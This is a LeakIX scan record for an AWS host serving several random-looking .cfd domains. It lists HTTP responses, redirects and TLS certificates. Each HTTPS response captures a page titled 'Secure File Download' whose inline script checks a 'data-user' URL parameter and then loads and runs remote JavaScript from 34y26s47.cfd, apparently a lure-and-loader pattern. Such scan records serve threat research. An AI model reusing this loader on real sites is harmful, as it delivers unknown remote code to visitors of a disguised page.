Host 18.117.165.6
United States
AMAZON-02
Ubuntu
Software information

nginx nginx 1.24.0

tcp/443 tcp/80

  • Open service 18.117.165.6:443 · 2dwfywd2.cfd

    2025-01-14 10:02 

    HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Tue, 14 Jan 2025 10:02:10 GMT
Content-Type: text/html
Content-Length: 2226
Last-Modified: Sat, 11 Jan 2025 20:59:30 GMT
Connection: close
ETag: "6782dbb2-8b2"
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Accept-Ranges: bytes

Page title: Secure File Download

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Secure File Download</title>
</head>
<body>
  <div id="error-message">
    <!-- Error message will appear here if something goes wrong -->
  </div>

  <script>
    // Extract all query parameters from the current URL
    const urlParams = new URLSearchParams(window.location.search);

    // Check if both 'data-user' and 'device' are present
    const dataUser = urlParams.get('data-user');
    const deviceType = urlParams.get('device');

    if (!dataUser) {
      // Update the title to "Error" if any of the required parameters are missing
      document.title = "Error";

      // Show error message if any of the required parameters are missing
      document.getElementById('error-message').style.display = 'block';
      document.getElementById('error-message').innerHTML = 'Something went wrong.';
    } else {
      // Update the title to "Processing..." if both parameters are present
      document.title = "Secure File Download";

      // Iterate through all query parameters and log them to the console (for debugging)
      urlParams.forEach((value, key) => {
        console.log(`${key}: ${value}`);
      });

      // Build the URL for the script tag with all the query parameters
      const scriptUrl = `https://34y26s47.cfd/api/offer-script.js`;

      // Dynamically create and append the script tag with the built URL
      const scriptElement = document.createElement('script');
      scriptElement.src = scriptUrl;
      scriptElement.async = true;
      document.body.appendChild(scriptElement);
    }
  </script>
<script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"rayId":"8fb26a3e797c91bf","version":"2024.10.5","r":1,"token":"8918a5beca4542f18c8c1cfae736cc6a","serverTiming":{"name":{"cfExtPri":true,"cfL4":true,"cfSpeedBrain":true,"cfCacheStatus":true}}}' crossorigin="anonymous"></script>
</body>
</html>
    Found 2025-01-14 by HttpPlugin
    Create report

  • Open service 18.117.165.6:80 · www.2dwfywd2.cfd

    2025-01-14 10:02 

    HTTP/1.1 301 Moved Permanently
Server: nginx/1.24.0 (Ubuntu)
Date: Tue, 14 Jan 2025 10:02:08 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://www.2dwfywd2.cfd/

Page title: 301 Moved Permanently

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.24.0 (Ubuntu)</center>
</body>
</html>
    Found 2025-01-14 by HttpPlugin
    Create report

  • Open service 18.117.165.6:80 · 2dwfywd2.cfd

    2025-01-14 10:02 

    HTTP/1.1 301 Moved Permanently
Server: nginx/1.24.0 (Ubuntu)
Date: Tue, 14 Jan 2025 10:02:08 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://2dwfywd2.cfd/

Page title: 301 Moved Permanently

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.24.0 (Ubuntu)</center>
</body>
</html>
    Found 2025-01-14 by HttpPlugin
    Create report

  • Open service 18.117.165.6:443 · yiz484fg.cfd

    2025-01-14 10:01 

    HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Tue, 14 Jan 2025 10:01:44 GMT
Content-Type: text/html
Content-Length: 2226
Last-Modified: Sat, 11 Jan 2025 20:59:30 GMT
Connection: close
ETag: "6782dbb2-8b2"
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Accept-Ranges: bytes

Page title: Secure File Download

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Secure File Download</title>
</head>
<body>
  <div id="error-message">
    <!-- Error message will appear here if something goes wrong -->
  </div>

  <script>
    // Extract all query parameters from the current URL
    const urlParams = new URLSearchParams(window.location.search);

    // Check if both 'data-user' and 'device' are present
    const dataUser = urlParams.get('data-user');
    const deviceType = urlParams.get('device');

    if (!dataUser) {
      // Update the title to "Error" if any of the required parameters are missing
      document.title = "Error";

      // Show error message if any of the required parameters are missing
      document.getElementById('error-message').style.display = 'block';
      document.getElementById('error-message').innerHTML = 'Something went wrong.';
    } else {
      // Update the title to "Processing..." if both parameters are present
      document.title = "Secure File Download";

      // Iterate through all query parameters and log them to the console (for debugging)
      urlParams.forEach((value, key) => {
        console.log(`${key}: ${value}`);
      });

      // Build the URL for the script tag with all the query parameters
      const scriptUrl = `https://34y26s47.cfd/api/offer-script.js`;

      // Dynamically create and append the script tag with the built URL
      const scriptElement = document.createElement('script');
      scriptElement.src = scriptUrl;
      scriptElement.async = true;
      document.body.appendChild(scriptElement);
    }
  </script>
<script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"rayId":"8fb26a3e797c91bf","version":"2024.10.5","r":1,"token":"8918a5beca4542f18c8c1cfae736cc6a","serverTiming":{"name":{"cfExtPri":true,"cfL4":true,"cfSpeedBrain":true,"cfCacheStatus":true}}}' crossorigin="anonymous"></script>
</body>
</html>
    Found 2025-01-14 by HttpPlugin
    Create report

  • Open service 18.117.165.6:80 · yiz484fg.cfd

    2025-01-14 10:01 

    HTTP/1.1 301 Moved Permanently
Server: nginx/1.24.0 (Ubuntu)
Date: Tue, 14 Jan 2025 10:01:43 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://yiz484fg.cfd/

Page title: 301 Moved Permanently

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.24.0 (Ubuntu)</center>
</body>
</html>
    Found 2025-01-14 by HttpPlugin
    Create report

  • Open service 18.117.165.6:443 · www.yiz484fg.cfd

    2025-01-14 10:01 

    HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Tue, 14 Jan 2025 10:01:46 GMT
Content-Type: text/html
Content-Length: 2226
Last-Modified: Sat, 11 Jan 2025 20:59:30 GMT
Connection: close
ETag: "6782dbb2-8b2"
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Accept-Ranges: bytes

Page title: Secure File Download

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Secure File Download</title>
</head>
<body>
  <div id="error-message">
    <!-- Error message will appear here if something goes wrong -->
  </div>

  <script>
    // Extract all query parameters from the current URL
    const urlParams = new URLSearchParams(window.location.search);

    // Check if both 'data-user' and 'device' are present
    const dataUser = urlParams.get('data-user');
    const deviceType = urlParams.get('device');

    if (!dataUser) {
      // Update the title to "Error" if any of the required parameters are missing
      document.title = "Error";

      // Show error message if any of the required parameters are missing
      document.getElementById('error-message').style.display = 'block';
      document.getElementById('error-message').innerHTML = 'Something went wrong.';
    } else {
      // Update the title to "Processing..." if both parameters are present
      document.title = "Secure File Download";

      // Iterate through all query parameters and log them to the console (for debugging)
      urlParams.forEach((value, key) => {
        console.log(`${key}: ${value}`);
      });

      // Build the URL for the script tag with all the query parameters
      const scriptUrl = `https://34y26s47.cfd/api/offer-script.js`;

      // Dynamically create and append the script tag with the built URL
      const scriptElement = document.createElement('script');
      scriptElement.src = scriptUrl;
      scriptElement.async = true;
      document.body.appendChild(scriptElement);
    }
  </script>
<script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"rayId":"8fb26a3e797c91bf","version":"2024.10.5","r":1,"token":"8918a5beca4542f18c8c1cfae736cc6a","serverTiming":{"name":{"cfExtPri":true,"cfL4":true,"cfSpeedBrain":true,"cfCacheStatus":true}}}' crossorigin="anonymous"></script>
</body>
</html>
    Found 2025-01-14 by HttpPlugin
    Create report

  • Open service 18.117.165.6:80 · www.yiz484fg.cfd

    2025-01-14 10:01 

    HTTP/1.1 301 Moved Permanently
Server: nginx/1.24.0 (Ubuntu)
Date: Tue, 14 Jan 2025 10:01:44 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://www.yiz484fg.cfd/

Page title: 301 Moved Permanently

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.24.0 (Ubuntu)</center>
</body>
</html>
    Found 2025-01-14 by HttpPlugin
    Create report

  • Open service 18.117.165.6:80

    2025-01-06 21:32 

    HTTP/1.1 404 Not Found
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 06 Jan 2025 21:32:52 GMT
Content-Type: text/html
Content-Length: 564
Connection: close

Page title: 404 Not Found

<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.24.0 (Ubuntu)</center>
</body>
</html>
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
    Found 2025-01-06 by HttpPlugin
    Create report

  • Open service 18.117.165.6:443

    2025-01-06 18:22 

    HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Mon, 06 Jan 2025 18:22:52 GMT
Content-Type: text/html
Content-Length: 2226
Last-Modified: Wed, 01 Jan 2025 12:12:00 GMT
Connection: close
ETag: "67753110-8b2"
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Accept-Ranges: bytes

Page title: Secure File Download

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Secure File Download</title>
</head>
<body>
  <div id="error-message">
    <!-- Error message will appear here if something goes wrong -->
  </div>

  <script>
    // Extract all query parameters from the current URL
    const urlParams = new URLSearchParams(window.location.search);

    // Check if both 'data-user' and 'device' are present
    const dataUser = urlParams.get('data-user');
    const deviceType = urlParams.get('device');

    if (!dataUser) {
      // Update the title to "Error" if any of the required parameters are missing
      document.title = "Error";

      // Show error message if any of the required parameters are missing
      document.getElementById('error-message').style.display = 'block';
      document.getElementById('error-message').innerHTML = 'Something went wrong.';
    } else {
      // Update the title to "Processing..." if both parameters are present
      document.title = "Secure File Download";

      // Iterate through all query parameters and log them to the console (for debugging)
      urlParams.forEach((value, key) => {
        console.log(`${key}: ${value}`);
      });

      // Build the URL for the script tag with all the query parameters
      const scriptUrl = `https://34y26s47.cfd/api/offer-script.js`;

      // Dynamically create and append the script tag with the built URL
      const scriptElement = document.createElement('script');
      scriptElement.src = scriptUrl;
      scriptElement.async = true;
      document.body.appendChild(scriptElement);
    }
  </script>
<script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"rayId":"8fb26a3e797c91bf","version":"2024.10.5","r":1,"token":"8918a5beca4542f18c8c1cfae736cc6a","serverTiming":{"name":{"cfExtPri":true,"cfL4":true,"cfSpeedBrain":true,"cfCacheStatus":true}}}' crossorigin="anonymous"></script>
</body>
</html>
    Found 2025-01-06 by HttpPlugin
    Create report

  • Open service 18.117.165.6:80 · www.njwx793o.cfd

    2025-01-04 00:45 

    HTTP/1.1 301 Moved Permanently
Server: nginx/1.24.0 (Ubuntu)
Date: Sat, 04 Jan 2025 00:45:17 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://www.njwx793o.cfd/

Page title: 301 Moved Permanently

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.24.0 (Ubuntu)</center>
</body>
</html>
    Found 2025-01-04 by HttpPlugin
    Create report

  • Open service 18.117.165.6:443 · www.njwx793o.cfd

    2025-01-04 00:45 

    HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Sat, 04 Jan 2025 00:45:19 GMT
Content-Type: text/html
Content-Length: 2226
Last-Modified: Wed, 01 Jan 2025 12:12:00 GMT
Connection: close
ETag: "67753110-8b2"
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Accept-Ranges: bytes

Page title: Secure File Download

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Secure File Download</title>
</head>
<body>
  <div id="error-message">
    <!-- Error message will appear here if something goes wrong -->
  </div>

  <script>
    // Extract all query parameters from the current URL
    const urlParams = new URLSearchParams(window.location.search);

    // Check if both 'data-user' and 'device' are present
    const dataUser = urlParams.get('data-user');
    const deviceType = urlParams.get('device');

    if (!dataUser) {
      // Update the title to "Error" if any of the required parameters are missing
      document.title = "Error";

      // Show error message if any of the required parameters are missing
      document.getElementById('error-message').style.display = 'block';
      document.getElementById('error-message').innerHTML = 'Something went wrong.';
    } else {
      // Update the title to "Processing..." if both parameters are present
      document.title = "Secure File Download";

      // Iterate through all query parameters and log them to the console (for debugging)
      urlParams.forEach((value, key) => {
        console.log(`${key}: ${value}`);
      });

      // Build the URL for the script tag with all the query parameters
      const scriptUrl = `https://34y26s47.cfd/api/offer-script.js`;

      // Dynamically create and append the script tag with the built URL
      const scriptElement = document.createElement('script');
      scriptElement.src = scriptUrl;
      scriptElement.async = true;
      document.body.appendChild(scriptElement);
    }
  </script>
<script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"rayId":"8fb26a3e797c91bf","version":"2024.10.5","r":1,"token":"8918a5beca4542f18c8c1cfae736cc6a","serverTiming":{"name":{"cfExtPri":true,"cfL4":true,"cfSpeedBrain":true,"cfCacheStatus":true}}}' crossorigin="anonymous"></script>
</body>
</html>
    Found 2025-01-04 by HttpPlugin
    Create report

  • Open service 18.117.165.6:80 · njwx793o.cfd

    2025-01-04 00:45 

    HTTP/1.1 301 Moved Permanently
Server: nginx/1.24.0 (Ubuntu)
Date: Sat, 04 Jan 2025 00:45:17 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: https://njwx793o.cfd/

Page title: 301 Moved Permanently

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.24.0 (Ubuntu)</center>
</body>
</html>
    Found 2025-01-04 by HttpPlugin
    Create report

  • Open service 18.117.165.6:443 · njwx793o.cfd

    2025-01-04 00:45 

    HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Sat, 04 Jan 2025 00:45:19 GMT
Content-Type: text/html
Content-Length: 2226
Last-Modified: Wed, 01 Jan 2025 12:12:00 GMT
Connection: close
ETag: "67753110-8b2"
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Accept-Ranges: bytes

Page title: Secure File Download

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Secure File Download</title>
</head>
<body>
  <div id="error-message">
    <!-- Error message will appear here if something goes wrong -->
  </div>

  <script>
    // Extract all query parameters from the current URL
    const urlParams = new URLSearchParams(window.location.search);

    // Check if both 'data-user' and 'device' are present
    const dataUser = urlParams.get('data-user');
    const deviceType = urlParams.get('device');

    if (!dataUser) {
      // Update the title to "Error" if any of the required parameters are missing
      document.title = "Error";

      // Show error message if any of the required parameters are missing
      document.getElementById('error-message').style.display = 'block';
      document.getElementById('error-message').innerHTML = 'Something went wrong.';
    } else {
      // Update the title to "Processing..." if both parameters are present
      document.title = "Secure File Download";

      // Iterate through all query parameters and log them to the console (for debugging)
      urlParams.forEach((value, key) => {
        console.log(`${key}: ${value}`);
      });

      // Build the URL for the script tag with all the query parameters
      const scriptUrl = `https://34y26s47.cfd/api/offer-script.js`;

      // Dynamically create and append the script tag with the built URL
      const scriptElement = document.createElement('script');
      scriptElement.src = scriptUrl;
      scriptElement.async = true;
      document.body.appendChild(scriptElement);
    }
  </script>
<script defer src="https://static.cloudflareinsights.com/beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015" integrity="sha512-ZpsOmlRQV6y907TI0dKBHq9Md29nnaEIPlkf84rnaERnq6zvWvPUqr2ft8M1aS28oN72PdrCzSjY4U6VaAw1EQ==" data-cf-beacon='{"rayId":"8fb26a3e797c91bf","version":"2024.10.5","r":1,"token":"8918a5beca4542f18c8c1cfae736cc6a","serverTiming":{"name":{"cfExtPri":true,"cfL4":true,"cfSpeedBrain":true,"cfCacheStatus":true}}}' crossorigin="anonymous"></script>
</body>
</html>
    Found 2025-01-04 by HttpPlugin
    Create report
2dwfywd2.cfdwww.2dwfywd2.cfd
Fingerprint:
e88f884d4e85b3829253d2c1ccbb330ea69f0d7cacbf4bb4595bfebec8b95764
CN:
2dwfywd2.cfd
Key:
ECDSA-256
Issuer:
E6
Not before:
2025-01-14 09:02
Not after:
2025-04-14 09:02
www.yiz484fg.cfdyiz484fg.cfd
Fingerprint:
6b14f5f1dfa09ce8a171ff7b34d4fff0c09366077d0f4ac5110d9a1a850c7ffc
CN:
yiz484fg.cfd
Key:
ECDSA-256
Issuer:
E5
Not before:
2025-01-14 09:01
Not after:
2025-04-14 09:01
njwx793o.cfdwww.njwx793o.cfd
Fingerprint:
4c50d763d88f71d98807aded9da9fc1dd89078eadab331bafd178341fbe051c6
CN:
njwx793o.cfd
Key:
ECDSA-256
Issuer:
E5
Not before:
2025-01-03 23:45
Not after:
2025-04-03 23:45
Domain summary

2dwfywd2.cfd 1 www.2dwfywd2.cfd 0 yiz484fg.cfd 1 www.yiz484fg.cfd 1 www.njwx793o.cfd 1 njwx793o.cfd 1

6 recorded

© 2025 LeakIX
About LeakIX - Credits - Take-down and blacklist requests - Security issues - Terms and conditions - Cookie policy - Legal notice